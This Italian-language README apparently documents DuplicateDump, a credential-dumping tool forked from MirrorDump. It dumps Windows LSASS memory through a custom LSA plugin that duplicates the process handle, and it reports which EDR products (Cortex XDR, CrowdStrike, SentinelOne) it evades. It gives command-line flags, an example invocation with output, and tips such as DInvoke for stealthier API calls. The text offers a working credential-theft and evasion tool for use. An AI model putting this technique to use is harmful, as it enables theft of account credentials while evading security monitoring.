
Dumping di LSASS con un handle duplicato da un plugin LSA personalizzato
DuplicateDump è un fork di MirrorDump con le seguenti modifiche:
DuplicateDump aggiunge un plugin LSA personalizzato che duplica l'handle del processo LSASS dal processo LSASS a DuplicateDump. Così DuplicateDump ha un handle di processo pronto per l'uso su LSASS senza invocare OpenProcess.
Caricando DuplicateDump in memoria, è stato in grado di dumpare la memoria di LSASS senza essere rilevato su
Rilevato da Cortex XDR, Crowdstrike. Non è riuscito a dumpare lsass senza essere rilevato su SentinalOne.
Compilare il plugin LSA (esportare la funzione SpLsaModeInitialize o dllMain) e fornire il percorso completo della DLL a DuplicateDump
.\DuplicateDump.exe --help
-f, --filename=VALUE The path to write the dump file to
-p, --plugin=VALUE Full file path to LSA plugin
-c, --compress GZip and delete the dump file on disk
-d, --DebugPriv Obtain SeDebugPrivilege
-h, --help Display this help
Example
.\DuplicateDump.exe -f test -c -p C:\LSAPlugin.dll
[+] Loading LSA security package
[+] Named pipe connected and replying with current PID 6492
[+] Found duplicated LSASS process handle 0x3d0
[+] Compressed dump file saved to test.gz
DuplicateDump usa DInvoke per chiamare l'API AddSecurityPackage per caricare un plugin LSA. Puoi usare una chiamata RPC senza dover invocare direttamente quella API. Controlla i dettagli nel post del blog di XPN.
Recentemente, splinter_code ha scoperto che SecLogon potrebbe essere sfruttato per dumpare LSASS. Raccomandiamo vivamente di studiare il suo post del blog.